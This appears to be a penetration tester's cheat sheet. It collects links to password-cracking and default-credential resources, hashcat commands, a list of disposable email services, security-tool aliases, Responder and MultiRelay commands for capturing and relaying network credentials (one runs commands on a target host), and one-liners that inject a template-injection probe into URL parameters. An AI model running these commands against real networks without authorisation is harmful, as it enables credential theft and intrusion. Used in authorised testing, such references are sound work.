# Cyberchef cli alternative
https://github.com/Ciphey/Ciphey

# Default creds:
https://cirt.net/passwords
https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials
https://github.com/LandGrey/pydictor
https://github.com/Mebus/cupp
https://github.com/sc0tfree/mentalist

# Dedupe wordlists
# https://github.com/nil0x42/duplicut
./duplicut wordlist.txt -o clean-wordlist.txt

# Hashcat
hashcat --stdout wordlist.txt -r /usr/share/hashcat/rules/best64.rule
# ntlm
hashcat hash_input.txt -m 1000 -a 3 -d 1 -o cracked.txt
# dict attack
hashcat hash.txt dict1.txt dict2.txt dict3.txt
# mask
hashcat -a 3 ?a?a?a?a?a?a?a -i
# Hashcat for noobs
https://github.com/trustedsec/hate_crack

# Good rule
https://github.com/NotSoSecure/password_cracking_rules/blob/master/OneRuleToRuleThemAll.rule

# Temporary emails
https://www.guerrillamail.com/en/
https://10minutemail.com
https://www.trash-mail.com/inbox/
https://www.mailinator.com
http://www.yopmail.com/en
https://generator.email
https://en.getairmail.com
http://www.throwawaymail.com/en
https://maildrop.cc
https://owlymail.com/en
https://www.moakt.com
https://tempail.com
http://www.yopmail.com
https://temp-mail.org/en
https://www.mohmal.com
http://od.obagg.com 
http://onedrive.readmail.net
http://xkx.me 
https://t.odmail.cn
https://www.emailondeck.com
https://anonbox.net
https://M.kuku.lu
https://www.temp-mails.com/
http://deadfake.com/
https://www.sharklasers.com/
https://mytemp.email/
http://www.mintemail.com/
http://www.eyepaste.com/
mailsucker.net
https://www.emailondeck.com/
https://getnada.com/
http://www.fakeinbox.com/
https://temp-mail.org/
https://www.tempmailaddress.com/
https://tempail.com/
https://tempm.com/
https://mailsac.com/
https://smailpro.com/

# Printer attacks
https://github.com/RUB-NDS/PRET

# Aliases
alias cat="bat --style=grid"
alias dockly='docker run -it --rm -v /var/run/docker.sock:/var/run/docker.sock lirantal/dockly'
alias sniper='docker run -it xerosecurity/sn1per /bin/bash'
alias myip='ip -br -c a && echo && curl ifconfig.me'
alias lsla='colorls -lA --sd --gs --group-directories-first'
alias gitleaks='docker run --rm --name=gitleaks zricethezav/gitleaks -v --pretty -r 
alias grp='git reset --hard origin/master && git pull'
alias ccat='pygmentize -O style=monokai -f console256 -g'
alias testssl='~/Escritorio/tools/testssl.sh/testssl.sh'
alias nano='micro'
alias scoutsuite='cd /home/user/tools/ScoutSuite && docker run --rm -t \
-v ~/.aws:/root/.aws:ro \
-v "$(pwd)/results:/opt/scoutsuite-report" \
scoutsuite:latest \
aws'
alias services_running='systemctl list-units --type=service --state=running'
alias pwndb='sudo python3 ~/PATH/pwndb/pwndb.py --target'
alias s3scanner='sudo python3 ~/PATH/S3Scanner/s3scanner.py'
alias flumberbuckets='sudo python3 ~/PATH/flumberboozle/flumberbuckets/flumberbuckets.py -p'

# Responder

# Analyze/Listen mode
responder -I [Interface] -A 
responder -I [Interface] -i [IP Address] or -e [External IP] -A
# Normal mode (disable smb and http server in /usr/share/responder/Responder.conf)
responder -I eth0 -rv
# Check targets with smb signing not enabled
python RunFinger.py -i 10.0.2.0/24
# MultiRelay with all users for all services
python MultiRelay.py -t 10.0.2.4 -u ALL
# Reverse shell via Multirelay
./MultiRelay.py -t <target host> -c <'command to run'> -u <user to target>
# Make changes to config to turn off services:
nano /usr/share/responder/Responder.conf

# Oneliners

# Subdomain scan + alive hosts + web scan
chaos -d domain.com | httpx -silent | anew | xargs -I@ jaeles scan -u @
chaos -d domain.com | httpx -silent | anew | nuclei -t /nuclei-templates

# Check payload in all param with qsreplace (SSTI example)
waybackurls http://target.com | qsreplace "ssti{{9*9}}" > fuzz.txt
ffuf -u FUZZ -w fuzz.txt -replay-proxy http://127.0.0.1:8080/
# Check in burp for reponses with ssti81